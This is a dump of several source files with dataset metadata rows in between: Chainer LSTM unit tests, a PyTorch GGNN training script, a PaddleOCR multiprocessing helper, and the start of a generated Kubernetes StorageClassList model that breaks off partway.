    Runs once with use_cudnn=True and once with use_cudnn=False via
    testing.parameterize.
    """

    # Per-timestep mini-batch sizes (the batch shrinks over time because
    # sequences have different lengths).
    batches = [3, 2, 1]
    length = len(batches)
    in_size = 3
    out_size = 2
    n_layers = 2
    dropout = 0.0

    def setUp(self):
        """Build random inputs, initial states, weights and upstream grads.

        Weight layout per layer: 8 matrices/biases, where indices 0-3
        multiply the layer input and 4-7 multiply the recurrent hidden
        state, in gate order (input, forget, cell, output) — matching the
        reference computation in check_forward.
        """
        # One (batch, in_size) input per time step.
        self.xs = [numpy.random.uniform(-1, 1, (b, self.in_size)).astype('f')
                   for b in self.batches]
        # Initial hidden/cell states: (layers, max_batch, out_size).
        h_shape = (self.n_layers, self.batches[0], self.out_size)
        self.cx = numpy.random.uniform(-1, 1, h_shape).astype(numpy.float32)
        self.hx = numpy.random.uniform(-1, 1, h_shape).astype(numpy.float32)

        self.ws = []
        self.bs = []
        for i in range(self.n_layers):
            weights = []
            biases = []
            for j in range(8):
                # Only the first layer's input-side weights (j < 4) take the
                # raw input size; everything else maps out_size -> out_size.
                if i == 0 and j < 4:
                    w_in = self.in_size
                else:
                    w_in = self.out_size
                weights.append(numpy.random.uniform(
                    -1, 1, (self.out_size, w_in)).astype('f'))
                biases.append(numpy.random.uniform(
                    -1, 1, (self.out_size,)).astype('f'))
            self.ws.append(weights)
            self.bs.append(biases)

        # Upstream gradients for the backward test.
        self.dys = [numpy.random.uniform(-1, 1, (b, self.out_size)).astype('f')
                    for b in self.batches]
        self.dcy = numpy.random.uniform(-1, 1, h_shape).astype(numpy.float32)
        self.dhy = numpy.random.uniform(-1, 1, h_shape).astype(numpy.float32)

    def check_forward(
            self, h_data, c_data, xs_data, ws_data, bs_data, volatile):
        """Run n_step_lstm and compare against a hand-rolled LSTM in NumPy."""
        h = chainer.Variable(h_data, volatile=volatile)
        c = chainer.Variable(c_data, volatile=volatile)
        xs = [chainer.Variable(x, volatile=volatile) for x in xs_data]
        ws = [[chainer.Variable(w, volatile=volatile) for w in ws]
              for ws in ws_data]
        bs = [[chainer.Variable(b, volatile=volatile) for b in bs]
              for bs in bs_data]
        hy, cy, ys = functions.n_step_lstm(
            self.n_layers, self.dropout, h, c, ws, bs, xs,
            use_cudnn=self.use_cudnn)

        # Reference computation: stacked LSTM unrolled over time, updating
        # only the first `batch` rows of each layer's state per step.
        e_hy = self.hx.copy()
        e_cy = self.cx.copy()
        for ind in range(self.length):
            x = self.xs[ind]
            batch = x.shape[0]
            for layer in range(self.n_layers):
                w = self.ws[layer]
                b = self.bs[layer]
                h_prev = e_hy[layer, :batch]
                c_prev = e_cy[layer, :batch]
                # Standard LSTM gates: input, forget, candidate cell, output.
                i = sigmoid(x.dot(w[0].T) + h_prev.dot(w[4].T) + b[0] + b[4])
                f = sigmoid(x.dot(w[1].T) + h_prev.dot(w[5].T) + b[1] + b[5])
                c_bar = numpy.tanh(
                    x.dot(w[2].T) + h_prev.dot(w[6].T) + b[2] + b[6])
                o = sigmoid(x.dot(w[3].T) + h_prev.dot(w[7].T) + b[3] + b[7])
                e_c = (f * c_prev + i * c_bar)
                e_h = o * numpy.tanh(e_c)
                e_hy[layer, :batch] = e_h
                e_cy[layer, :batch] = e_c

                # The hidden state feeds the next layer as its input.
                x = e_h

            # The top layer's hidden state is the per-step output.
            testing.assert_allclose(
                ys[ind].data, x, rtol=1e-4, atol=1e-4)

        testing.assert_allclose(hy.data, e_hy, rtol=1e-4, atol=1e-4)
        testing.assert_allclose(cy.data, e_cy, rtol=1e-4, atol=1e-4)

    def test_forward_cpu(self):
        self.check_forward(self.hx, self.cx, self.xs, self.ws, self.bs, False)

    def test_forward_cpu_volatile(self):
        self.check_forward(self.hx, self.cx, self.xs, self.ws, self.bs, True)

    @attr.gpu
    def test_forward_gpu(self):
        self.check_forward(cuda.to_gpu(self.hx),
                           cuda.to_gpu(self.cx),
                           [cuda.to_gpu(x) for x in self.xs],
                           [[cuda.to_gpu(w) for w in ws] for ws in self.ws],
                           [[cuda.to_gpu(b) for b in bs] for bs in self.bs],
                           False)

    @attr.gpu
    def test_forward_gpu_volatile(self):
        self.check_forward(cuda.to_gpu(self.hx),
                           cuda.to_gpu(self.cx),
                           [cuda.to_gpu(x) for x in self.xs],
                           [[cuda.to_gpu(w) for w in ws] for ws in self.ws],
                           [[cuda.to_gpu(b) for b in bs] for bs in self.bs],
                           True)

    def check_backward(self, h_data, c_data, xs_data, ws_data, bs_data,
                       dhy_data, dcy_data, dys_data):
        """Numerically check gradients of n_step_lstm w.r.t. all inputs."""
        # Flatten (h, c, all weights, all biases, all xs) into one tuple so
        # gradient_check can perturb each array independently.
        args = tuple([h_data, c_data] + sum(ws_data, []) + sum(bs_data, []) +
                     xs_data)
        grads = tuple([dhy_data, dcy_data] + dys_data)

        def f(*inputs):
            # Re-assemble the flat argument tuple into the structured
            # (hx, cx, ws, bs, xs) arguments expected by n_step_lstm.
            (hx, cx), inputs = _split(inputs, 2)
            ws = []
            for i in range(self.n_layers):
                weights, inputs = _split(inputs, 8)
                ws.append(weights)
            bs = []
            for i in range(self.n_layers):
                biases, inputs = _split(inputs, 8)
                bs.append(biases)
            xs = inputs
            hy, cy, ys = functions.n_step_lstm(
                self.n_layers, self.dropout, hx, cx, ws, bs, xs)
            return (hy, cy) + ys

        gradient_check.check_backward(
            f, args, grads, eps=1e-2, rtol=1e-3, atol=1e-3)

    def test_backward_cpu(self):
        self.check_backward(self.hx, self.cx, self.xs, self.ws, self.bs,
                            self.dhy, self.dcy, self.dys)

    @attr.gpu
    def test_backward_gpu(self):
        self.check_backward(cuda.to_gpu(self.hx),
                            cuda.to_gpu(self.cx),
                            [cuda.to_gpu(x) for x in self.xs],
                            [[cuda.to_gpu(w) for w in ws] for ws in self.ws],
                            [[cuda.to_gpu(b) for b in bs] for bs in self.bs],
                            cuda.to_gpu(self.dhy),
                            cuda.to_gpu(self.dcy),
                            [cuda.to_gpu(dy) for dy in self.dys])
@testing.parameterize(*testing.product({
    'use_cudnn': [True, False],
}))
@attr.cudnn
class TestNStepLSTMCudnnCall(unittest.TestCase):
    """Verifies that n_step_lstm dispatches to the cuDNN RNN kernels exactly
    when use_cudnn is set and the installed cuDNN is new enough (>= v5)."""

    # Per-timestep mini-batch sizes (sequences of varying length).
    batches = [4, 3, 2, 1]
    length = len(batches)
    in_size = 3
    out_size = 4
    n_layers = 2
    dropout = 0.0

    def setUp(self):
        """Build random GPU inputs/weights and compute the expected dispatch."""
        self.xs = [cuda.cupy.random.uniform(
            -1, 1, (b, self.in_size)).astype('f')
            for b in self.batches]
        h_shape = (self.n_layers, self.batches[0], self.out_size)
        self.cx = cuda.cupy.random.uniform(-1, 1, h_shape).astype('f')
        self.hx = cuda.cupy.random.uniform(-1, 1, h_shape).astype('f')
        self.ws = []
        self.bs = []
        for i in range(self.n_layers):
            weights = []
            biases = []
            for j in range(8):
                # First layer's input-side weights (j < 4) use in_size;
                # all other weights map out_size -> out_size.
                if i == 0 and j < 4:
                    w_in = self.in_size
                else:
                    w_in = self.out_size
                weights.append(cuda.cupy.random.uniform(
                    -1, 1, (self.out_size, w_in)).astype('f'))
                biases.append(cuda.cupy.random.uniform(
                    -1, 1, (self.out_size,)).astype('f'))
            self.ws.append(weights)
            self.bs.append(biases)
        self.dys = [cuda.cupy.random.uniform(
            -1, 1, (b, self.out_size)).astype('f')
            for b in self.batches]
        self.dcy = cuda.cupy.random.uniform(-1, 1, h_shape).astype('f')
        self.dhy = cuda.cupy.random.uniform(-1, 1, h_shape).astype('f')
        # cuDNN should only be invoked when requested AND version >= 5000.
        self.expect = self.use_cudnn and (
            cuda.cudnn.cudnn.getVersion() >= 5000)

    def forward(self, train):
        """Run one n_step_lstm forward pass in train or inference mode."""
        volatile = not train
        h = chainer.Variable(self.hx, volatile=volatile)
        c = chainer.Variable(self.cx, volatile=volatile)
        xs = [chainer.Variable(x, volatile=volatile) for x in self.xs]
        ws = [[chainer.Variable(w, volatile=volatile) for w in ws]
              for ws in self.ws]
        bs = [[chainer.Variable(b, volatile=volatile) for b in bs]
              for bs in self.bs]
        with chainer.using_config('train', train):
            return functions.n_step_lstm(
                self.n_layers, self.dropout, h, c, ws, bs, xs,
                use_cudnn=self.use_cudnn)

    def test_call_cudnn_forward_training(self):
        # Patch the cuDNN entry point and check whether it was hit.
        with mock.patch('cupy.cuda.cudnn.RNNForwardTraining') as func:
            self.forward(True)
            self.assertEqual(func.called, self.expect)

    def test_call_cudnn_forward_inference(self):
        with mock.patch('cupy.cuda.cudnn.RNNForwardInference') as func:
            self.forward(False)
            self.assertEqual(func.called, self.expect)

    def test_call_cudnn_backward(self):
        hy, cy, ys = self.forward(True)
        hy.grad = self.dhy
        with mock.patch('cupy.cuda.cudnn.RNNBackwardWeights') as func:
            hy.backward()
            self.assertEqual(func.called, self.expect)
# Register this module's tests with Chainer's test runner.
testing.run_module(__name__, __file__)
| 36.78 | 79 | 0.531485 | import unittest
import mock
import numpy
import chainer
from chainer import cuda
from chainer import functions
from chainer import gradient_check
from chainer import testing
from chainer.testing import attr
def sigmoid(x):
return numpy.tanh(x * 0.5) * 0.5 + 0.5
def _split(inputs, pos):
return inputs[:pos], inputs[pos:]
@testing.parameterize(*testing.product({
'use_cudnn': [True, False],
}))
class TestNStepLSTM(unittest.TestCase):
batches = [3, 2, 1]
length = len(batches)
in_size = 3
out_size = 2
n_layers = 2
dropout = 0.0
def setUp(self):
self.xs = [numpy.random.uniform(-1, 1, (b, self.in_size)).astype('f')
for b in self.batches]
h_shape = (self.n_layers, self.batches[0], self.out_size)
self.cx = numpy.random.uniform(-1, 1, h_shape).astype(numpy.float32)
self.hx = numpy.random.uniform(-1, 1, h_shape).astype(numpy.float32)
self.ws = []
self.bs = []
for i in range(self.n_layers):
weights = []
biases = []
for j in range(8):
if i == 0 and j < 4:
w_in = self.in_size
else:
w_in = self.out_size
weights.append(numpy.random.uniform(
-1, 1, (self.out_size, w_in)).astype('f'))
biases.append(numpy.random.uniform(
-1, 1, (self.out_size,)).astype('f'))
self.ws.append(weights)
self.bs.append(biases)
self.dys = [numpy.random.uniform(-1, 1, (b, self.out_size)).astype('f')
for b in self.batches]
self.dcy = numpy.random.uniform(-1, 1, h_shape).astype(numpy.float32)
self.dhy = numpy.random.uniform(-1, 1, h_shape).astype(numpy.float32)
def check_forward(
self, h_data, c_data, xs_data, ws_data, bs_data, volatile):
h = chainer.Variable(h_data, volatile=volatile)
c = chainer.Variable(c_data, volatile=volatile)
xs = [chainer.Variable(x, volatile=volatile) for x in xs_data]
ws = [[chainer.Variable(w, volatile=volatile) for w in ws]
for ws in ws_data]
bs = [[chainer.Variable(b, volatile=volatile) for b in bs]
for bs in bs_data]
hy, cy, ys = functions.n_step_lstm(
self.n_layers, self.dropout, h, c, ws, bs, xs,
use_cudnn=self.use_cudnn)
e_hy = self.hx.copy()
e_cy = self.cx.copy()
for ind in range(self.length):
x = self.xs[ind]
batch = x.shape[0]
for layer in range(self.n_layers):
w = self.ws[layer]
b = self.bs[layer]
h_prev = e_hy[layer, :batch]
c_prev = e_cy[layer, :batch]
i = sigmoid(x.dot(w[0].T) + h_prev.dot(w[4].T) + b[0] + b[4])
f = sigmoid(x.dot(w[1].T) + h_prev.dot(w[5].T) + b[1] + b[5])
c_bar = numpy.tanh(
x.dot(w[2].T) + h_prev.dot(w[6].T) + b[2] + b[6])
o = sigmoid(x.dot(w[3].T) + h_prev.dot(w[7].T) + b[3] + b[7])
e_c = (f * c_prev + i * c_bar)
e_h = o * numpy.tanh(e_c)
e_hy[layer, :batch] = e_h
e_cy[layer, :batch] = e_c
x = e_h
testing.assert_allclose(
ys[ind].data, x, rtol=1e-4, atol=1e-4)
testing.assert_allclose(hy.data, e_hy, rtol=1e-4, atol=1e-4)
testing.assert_allclose(cy.data, e_cy, rtol=1e-4, atol=1e-4)
def test_forward_cpu(self):
self.check_forward(self.hx, self.cx, self.xs, self.ws, self.bs, False)
def test_forward_cpu_volatile(self):
self.check_forward(self.hx, self.cx, self.xs, self.ws, self.bs, True)
@attr.gpu
def test_forward_gpu(self):
self.check_forward(cuda.to_gpu(self.hx),
cuda.to_gpu(self.cx),
[cuda.to_gpu(x) for x in self.xs],
[[cuda.to_gpu(w) for w in ws] for ws in self.ws],
[[cuda.to_gpu(b) for b in bs] for bs in self.bs],
False)
@attr.gpu
def test_forward_gpu_volatile(self):
self.check_forward(cuda.to_gpu(self.hx),
cuda.to_gpu(self.cx),
[cuda.to_gpu(x) for x in self.xs],
[[cuda.to_gpu(w) for w in ws] for ws in self.ws],
[[cuda.to_gpu(b) for b in bs] for bs in self.bs],
True)
def check_backward(self, h_data, c_data, xs_data, ws_data, bs_data,
dhy_data, dcy_data, dys_data):
args = tuple([h_data, c_data] + sum(ws_data, []) + sum(bs_data, []) +
xs_data)
grads = tuple([dhy_data, dcy_data] + dys_data)
def f(*inputs):
(hx, cx), inputs = _split(inputs, 2)
ws = []
for i in range(self.n_layers):
weights, inputs = _split(inputs, 8)
ws.append(weights)
bs = []
for i in range(self.n_layers):
biases, inputs = _split(inputs, 8)
bs.append(biases)
xs = inputs
hy, cy, ys = functions.n_step_lstm(
self.n_layers, self.dropout, hx, cx, ws, bs, xs)
return (hy, cy) + ys
gradient_check.check_backward(
f, args, grads, eps=1e-2, rtol=1e-3, atol=1e-3)
def test_backward_cpu(self):
self.check_backward(self.hx, self.cx, self.xs, self.ws, self.bs,
self.dhy, self.dcy, self.dys)
@attr.gpu
def test_backward_gpu(self):
self.check_backward(cuda.to_gpu(self.hx),
cuda.to_gpu(self.cx),
[cuda.to_gpu(x) for x in self.xs],
[[cuda.to_gpu(w) for w in ws] for ws in self.ws],
[[cuda.to_gpu(b) for b in bs] for bs in self.bs],
cuda.to_gpu(self.dhy),
cuda.to_gpu(self.dcy),
[cuda.to_gpu(dy) for dy in self.dys])
@testing.parameterize(*testing.product({
'use_cudnn': [True, False],
}))
@attr.cudnn
class TestNStepLSTMCudnnCall(unittest.TestCase):
batches = [4, 3, 2, 1]
length = len(batches)
in_size = 3
out_size = 4
n_layers = 2
dropout = 0.0
def setUp(self):
self.xs = [cuda.cupy.random.uniform(
-1, 1, (b, self.in_size)).astype('f')
for b in self.batches]
h_shape = (self.n_layers, self.batches[0], self.out_size)
self.cx = cuda.cupy.random.uniform(-1, 1, h_shape).astype('f')
self.hx = cuda.cupy.random.uniform(-1, 1, h_shape).astype('f')
self.ws = []
self.bs = []
for i in range(self.n_layers):
weights = []
biases = []
for j in range(8):
if i == 0 and j < 4:
w_in = self.in_size
else:
w_in = self.out_size
weights.append(cuda.cupy.random.uniform(
-1, 1, (self.out_size, w_in)).astype('f'))
biases.append(cuda.cupy.random.uniform(
-1, 1, (self.out_size,)).astype('f'))
self.ws.append(weights)
self.bs.append(biases)
self.dys = [cuda.cupy.random.uniform(
-1, 1, (b, self.out_size)).astype('f')
for b in self.batches]
self.dcy = cuda.cupy.random.uniform(-1, 1, h_shape).astype('f')
self.dhy = cuda.cupy.random.uniform(-1, 1, h_shape).astype('f')
self.expect = self.use_cudnn and (
cuda.cudnn.cudnn.getVersion() >= 5000)
def forward(self, train):
volatile = not train
h = chainer.Variable(self.hx, volatile=volatile)
c = chainer.Variable(self.cx, volatile=volatile)
xs = [chainer.Variable(x, volatile=volatile) for x in self.xs]
ws = [[chainer.Variable(w, volatile=volatile) for w in ws]
for ws in self.ws]
bs = [[chainer.Variable(b, volatile=volatile) for b in bs]
for bs in self.bs]
with chainer.using_config('train', train):
return functions.n_step_lstm(
self.n_layers, self.dropout, h, c, ws, bs, xs,
use_cudnn=self.use_cudnn)
def test_call_cudnn_forward_training(self):
with mock.patch('cupy.cuda.cudnn.RNNForwardTraining') as func:
self.forward(True)
self.assertEqual(func.called, self.expect)
def test_call_cudnn_forward_inference(self):
with mock.patch('cupy.cuda.cudnn.RNNForwardInference') as func:
self.forward(False)
self.assertEqual(func.called, self.expect)
def test_call_cudnn_backward(self):
hy, cy, ys = self.forward(True)
hy.grad = self.dhy
with mock.patch('cupy.cuda.cudnn.RNNBackwardWeights') as func:
hy.backward()
self.assertEqual(func.called, self.expect)
testing.run_module(__name__, __file__)
| true | true |
f7326a11d6895ddea9102d2cf1365d083cdc73a6 | 4,758 | py | Python | main_live.py | WuYff/ggnn.pytorch | 795bc7fb51876231406d71610aa5ec7ed29865c0 | [
"MIT"
] | null | null | null | main_live.py | WuYff/ggnn.pytorch | 795bc7fb51876231406d71610aa5ec7ed29865c0 | [
"MIT"
] | null | null | null | main_live.py | WuYff/ggnn.pytorch | 795bc7fb51876231406d71610aa5ec7ed29865c0 | [
"MIT"
] | null | null | null | import argparse
import random
import torch
import torch.nn as nn
import torch.optim as optim
from model_live import GGNN
from utils.train_live import train
from utils.test_live import test
from utils.validation_live import validation
from utils.data.wy_dataset_live import bAbIDataset
from utils.data.dataloader import bAbIDataloader
# Command-line interface: dataset selection, model hyper-parameters and
# training options. Parsed eagerly at import time into the module-level
# `opt` namespace used by main().
parser = argparse.ArgumentParser()
parser.add_argument('--task_id', type=int, default=4, help='bAbI task id')
parser.add_argument('--question_id', type=int, default=0, help='question types')
parser.add_argument('--workers', type=int, help='number of data loading workers', default=2)
# parser.add_argument('--batchSize', type=int, default=10, help='input batch size')
parser.add_argument('--batchSize', type=int, default=10, help='input batch size')
parser.add_argument('--state_dim', type=int, default=4, help='GGNN hidden state size')
parser.add_argument('--n_steps', type=int, default=1, help='propogation steps number of GGNN')
# parser.add_argument('--niter', type=int, default=10, help='number of epochs to train for')
parser.add_argument('--niter', type=int, default=15, help='number of epochs to train for')
parser.add_argument('--lr', type=float, default=0.01, help='learning rate')
parser.add_argument('--cuda', action='store_true', help='enables cuda')
parser.add_argument('--verbal', action='store_true', help='print training info or not')
parser.add_argument('--manualSeed', type=int, help='manual seed')
# --criterion selects the loss in main(): 1=SmoothL1, 2=L1, 3=MSE.
parser.add_argument('--criterion', type=int, default=1)
# --choice_steps selects how opt.n_steps is derived from n_node in main().
parser.add_argument('--choice_steps', type=int, default=2)
parser.add_argument('--how_many', type=int, default=40)
opt = parser.parse_args()
# TODO: shuffle before each epoch, specify the number of n_steps.
if opt.manualSeed is None:
    opt.manualSeed = random.randint(1, 10000)
print("Random Seed: ", opt.manualSeed)
# Seed both Python and torch RNGs for reproducibility.
random.seed(opt.manualSeed)
torch.manual_seed(opt.manualSeed)
# Hard-coded dataset location (machine-specific path).
opt.dataroot = '/home/yiwu/ggnn/wy/ggnn.pytorch/wy_data/live_jfree/lala'
#opt.dataroot = '/home/yiwu/ggnn/wy/ggnn.pytorch/wy_data/one'
if opt.cuda:
    torch.cuda.manual_seed_all(opt.manualSeed)
def main(opt):
    """Train, validate and test a GGNN on the live-variable dataset.

    Args:
        opt: parsed argparse namespace. Mutated in place with
            dataset-derived fields (annotation_dim, n_edge_types, n_node,
            state_dim, n_steps) before the model is built.
    """
    train_dataset = bAbIDataset(opt.dataroot, opt.question_id, "t", 0, opt.how_many)
    print("len(train_dataset)", len(train_dataset))
    # Validation/test splits reuse the node count discovered on the
    # training split so all graphs share one padded size.
    # NOTE(review): split tags "t"/"v"/"est" — presumably substring markers
    # understood by bAbIDataset; confirm against its implementation.
    validation_dataset = bAbIDataset(opt.dataroot, opt.question_id, "v",
                                     train_dataset.n_node, opt.how_many)
    validation_dataloader = bAbIDataloader(validation_dataset, batch_size=opt.batchSize, \
                                           shuffle=False, num_workers=2)
    print("len(validation_dataset)", len(validation_dataset))
    test_dataset = bAbIDataset(opt.dataroot, opt.question_id, "est",
                               train_dataset.n_node, opt.how_many)
    test_dataloader = bAbIDataloader(test_dataset, batch_size=opt.batchSize, \
                                     shuffle=False, num_workers=2)
    print("len(test_dataset)", len(test_dataset))

    # Derive model dimensions from the training data.
    opt.annotation_dim = train_dataset.n_def  # for bAbI
    opt.n_edge_types = train_dataset.n_edge_types
    opt.n_node = train_dataset.n_node
    opt.state_dim = opt.annotation_dim
    # Propagation step count, derived from the node count per --choice_steps
    # (default: n_node; 2: n_node/2; 3: 2*n_node; 4: n_node^2; 5: 0.3*n_node).
    opt.n_steps = opt.n_node
    if opt.choice_steps == 2:
        opt.n_steps = round(opt.n_node * 0.5)
    elif opt.choice_steps == 3:
        opt.n_steps = opt.n_node * 2
    elif opt.choice_steps == 4:
        opt.n_steps = opt.n_node * opt.n_node
    elif opt.choice_steps == 5:
        opt.n_steps = round(opt.n_node * 0.3)

    net = GGNN(opt)
    net.double()

    # Loss selection via --criterion: 1=SmoothL1 (default), 2=L1, 3=MSE.
    criterion = nn.SmoothL1Loss()
    if opt.criterion == 2:
        criterion = torch.nn.L1Loss()
    elif opt.criterion == 3:
        criterion = torch.nn.MSELoss()

    if opt.cuda:
        net.cuda()
        criterion.cuda()

    optimizer = optim.Adam(net.parameters(), lr=opt.lr)
    print("opt", opt)
    print(net)

    for epoch in range(0, opt.niter):
        # Rebuild the train loader each epoch so samples are reshuffled.
        train_dataloader = bAbIDataloader(train_dataset, batch_size=opt.batchSize, \
                                          shuffle=True, num_workers=4)
        print("len(train_dataloader)", len(train_dataloader))
        train(epoch, train_dataloader, net, criterion, optimizer, opt)
        validation(validation_dataloader, net, criterion, optimizer, opt)
        test(test_dataloader, net, criterion, optimizer, opt)
# Script entry point: `opt` is parsed at import time above.
if __name__ == "__main__":
    main(opt)
| 39.983193 | 107 | 0.696511 | import argparse
import random
import torch
import torch.nn as nn
import torch.optim as optim
from model_live import GGNN
from utils.train_live import train
from utils.test_live import test
from utils.validation_live import validation
from utils.data.wy_dataset_live import bAbIDataset
from utils.data.dataloader import bAbIDataloader
parser = argparse.ArgumentParser()
parser.add_argument('--task_id', type=int, default=4, help='bAbI task id')
parser.add_argument('--question_id', type=int, default=0, help='question types')
parser.add_argument('--workers', type=int, help='number of data loading workers', default=2)
parser.add_argument('--batchSize', type=int, default=10, help='input batch size')
parser.add_argument('--state_dim', type=int, default=4, help='GGNN hidden state size')
parser.add_argument('--n_steps', type=int, default=1, help='propogation steps number of GGNN')
parser.add_argument('--niter', type=int, default=15, help='number of epochs to train for')
parser.add_argument('--lr', type=float, default=0.01, help='learning rate')
parser.add_argument('--cuda', action='store_true', help='enables cuda')
parser.add_argument('--verbal', action='store_true', help='print training info or not')
parser.add_argument('--manualSeed', type=int, help='manual seed')
parser.add_argument('--criterion', type=int, default=1)
parser.add_argument('--choice_steps', type=int, default=2)
parser.add_argument('--how_many', type=int, default=40)
opt = parser.parse_args()
if opt.manualSeed is None:
opt.manualSeed = random.randint(1, 10000)
print("Random Seed: ", opt.manualSeed)
random.seed(opt.manualSeed)
torch.manual_seed(opt.manualSeed)
opt.dataroot = '/home/yiwu/ggnn/wy/ggnn.pytorch/wy_data/live_jfree/lala'
if opt.cuda:
torch.cuda.manual_seed_all(opt.manualSeed)
def main(opt):
train_dataset = bAbIDataset(opt.dataroot, opt.question_id, "t",0,opt.how_many)
print("len(train_dataset)",len(train_dataset))
validation_dataset = bAbIDataset(opt.dataroot, opt.question_id, "v", train_dataset.n_node,opt.how_many)
validation_dataloader = bAbIDataloader(validation_dataset, batch_size=opt.batchSize, \
shuffle=False, num_workers=2)
print("len(validation_dataset)",len(validation_dataset))
test_dataset = bAbIDataset(opt.dataroot, opt.question_id, "est", train_dataset.n_node,opt.how_many)
test_dataloader = bAbIDataloader(test_dataset, batch_size=opt.batchSize, \
shuffle=False, num_workers=2)
print("len(test_dataset)",len(test_dataset))
opt.annotation_dim = train_dataset.n_def
opt.n_edge_types = train_dataset.n_edge_types
opt.n_node = train_dataset.n_node
opt.state_dim = opt.annotation_dim
opt.n_steps = opt.n_node
if opt.choice_steps == 2:
opt.n_steps = round(opt.n_node*0.5)
elif opt.choice_steps == 3:
opt.n_steps = opt.n_node*2
elif opt.choice_steps == 4:
opt.n_steps = opt.n_node*opt.n_node
elif opt.choice_steps == 5:
opt.n_steps = round(opt.n_node*0.3)
net = GGNN(opt)
net.double()
criterion = nn.SmoothL1Loss()
if opt.criterion == 2:
criterion = torch.nn.L1Loss()
elif opt.criterion == 3:
criterion = torch.nn.MSELoss()
if opt.cuda:
net.cuda()
criterion.cuda()
optimizer = optim.Adam(net.parameters(), lr=opt.lr)
print("opt",opt)
print(net)
for epoch in range(0, opt.niter):
train_dataloader = bAbIDataloader(train_dataset, batch_size=opt.batchSize, \
shuffle=True, num_workers=4)
print("len(train_dataloader)",len(train_dataloader))
train(epoch, train_dataloader, net, criterion, optimizer, opt)
validation(validation_dataloader, net, criterion, optimizer, opt)
test(test_dataloader, net, criterion, optimizer, opt)
if __name__ == "__main__":
main(opt)
| true | true |
f7326a1f506ca5fb7b3e97b0d077dc016e7eb7c7 | 2,147 | py | Python | ppstructure/table/table_metric/parallel.py | nan-wang/PaddleOCR | 31b06a2fd19f877a09acaf658387bd919c289b8e | [
"Apache-2.0"
] | 20,401 | 2020-05-08T10:56:13.000Z | 2022-03-31T23:34:38.000Z | ppstructure/table/table_metric/parallel.py | justld/PaddleOCR | 09604c38e42591c240771edbbff43a6dd7ebf592 | [
"Apache-2.0"
] | 4,988 | 2020-05-10T08:19:41.000Z | 2022-03-31T17:57:11.000Z | ppstructure/table/table_metric/parallel.py | justld/PaddleOCR | 09604c38e42591c240771edbbff43a6dd7ebf592 | [
"Apache-2.0"
] | 4,479 | 2020-05-08T11:12:13.000Z | 2022-03-31T11:55:28.000Z | from tqdm import tqdm
from concurrent.futures import ProcessPoolExecutor, as_completed
def parallel_process(array, function, n_jobs=16, use_kwargs=False, front_num=0):
"""
A parallel version of the map function with a progress bar.
Args:
array (array-like): An array to iterate over.
function (function): A python function to apply to the elements of array
n_jobs (int, default=16): The number of cores to use
use_kwargs (boolean, default=False): Whether to consider the elements of array as dictionaries of
keyword arguments to function
front_num (int, default=3): The number of iterations to run serially before kicking off the parallel job.
Useful for catching bugs
Returns:
[function(array[0]), function(array[1]), ...]
"""
# We run the first few iterations serially to catch bugs
if front_num > 0:
front = [function(**a) if use_kwargs else function(a)
for a in array[:front_num]]
else:
front = []
# If we set n_jobs to 1, just run a list comprehension. This is useful for benchmarking and debugging.
if n_jobs == 1:
return front + [function(**a) if use_kwargs else function(a) for a in tqdm(array[front_num:])]
# Assemble the workers
with ProcessPoolExecutor(max_workers=n_jobs) as pool:
# Pass the elements of array into function
if use_kwargs:
futures = [pool.submit(function, **a) for a in array[front_num:]]
else:
futures = [pool.submit(function, a) for a in array[front_num:]]
kwargs = {
'total': len(futures),
'unit': 'it',
'unit_scale': True,
'leave': True
}
# Print out the progress as tasks complete
for f in tqdm(as_completed(futures), **kwargs):
pass
out = []
# Get the results from the futures.
for i, future in tqdm(enumerate(futures)):
try:
out.append(future.result())
except Exception as e:
out.append(e)
return front + out
| 41.288462 | 117 | 0.610154 | from tqdm import tqdm
from concurrent.futures import ProcessPoolExecutor, as_completed
def parallel_process(array, function, n_jobs=16, use_kwargs=False, front_num=0):
if front_num > 0:
front = [function(**a) if use_kwargs else function(a)
for a in array[:front_num]]
else:
front = []
if n_jobs == 1:
return front + [function(**a) if use_kwargs else function(a) for a in tqdm(array[front_num:])]
with ProcessPoolExecutor(max_workers=n_jobs) as pool:
if use_kwargs:
futures = [pool.submit(function, **a) for a in array[front_num:]]
else:
futures = [pool.submit(function, a) for a in array[front_num:]]
kwargs = {
'total': len(futures),
'unit': 'it',
'unit_scale': True,
'leave': True
}
for f in tqdm(as_completed(futures), **kwargs):
pass
out = []
for i, future in tqdm(enumerate(futures)):
try:
out.append(future.result())
except Exception as e:
out.append(e)
return front + out
| true | true |
f7326b3311cb80454a1fb34edc479c00815ea490 | 6,749 | py | Python | lib/kubernetes/client/models/v1_storage_class_list.py | splunkenizer/splunk_as_a_service_app | 97c4aaf927d2171bf131126cf9b70489ac75bc5a | [
"Apache-2.0"
] | 7 | 2019-12-21T00:14:14.000Z | 2021-03-11T14:51:37.000Z | lib/kubernetes/client/models/v1_storage_class_list.py | splunkenizer/splunk_as_a_service_app | 97c4aaf927d2171bf131126cf9b70489ac75bc5a | [
"Apache-2.0"
] | 29 | 2019-10-09T11:16:21.000Z | 2020-06-23T09:32:09.000Z | lib/kubernetes/client/models/v1_storage_class_list.py | splunkenizer/splunk_as_a_service_app | 97c4aaf927d2171bf131126cf9b70489ac75bc5a | [
"Apache-2.0"
] | 1 | 2021-05-07T10:13:31.000Z | 2021-05-07T10:13:31.000Z | # coding: utf-8
"""
Kubernetes
No description provided (generated by Swagger Codegen https://github.com/swagger-api/swagger-codegen)
OpenAPI spec version: v1.14.4
Generated by: https://github.com/swagger-api/swagger-codegen.git
"""
from pprint import pformat
from six import iteritems
import re
class V1StorageClassList(object):
    """Kubernetes ``StorageClassList`` swagger model.

    NOTE: This class is auto generated by the swagger code generator program
    and has been lightly modernized (``dict.items()`` instead of
    ``six.iteritems``; comprehensions instead of ``map``/``lambda``).

    Attributes:
        swagger_types (dict): The key is attribute name
            and the value is attribute type.
        attribute_map (dict): The key is attribute name
            and the value is json key in definition.
    """

    swagger_types = {
        'api_version': 'str',
        'items': 'list[V1StorageClass]',
        'kind': 'str',
        'metadata': 'V1ListMeta'
    }

    attribute_map = {
        'api_version': 'apiVersion',
        'items': 'items',
        'kind': 'kind',
        'metadata': 'metadata'
    }

    def __init__(self, api_version=None, items=None, kind=None, metadata=None):
        """
        V1StorageClassList - a model defined in Swagger

        Raises:
            ValueError: if `items` is None (it is the only required field;
                the `items` setter rejects None).
        """
        self._api_version = None
        self._items = None
        self._kind = None
        self._metadata = None
        self.discriminator = None

        if api_version is not None:
            self.api_version = api_version
        # Required: assigning through the property validates non-None.
        self.items = items
        if kind is not None:
            self.kind = kind
        if metadata is not None:
            self.metadata = metadata

    @property
    def api_version(self):
        """
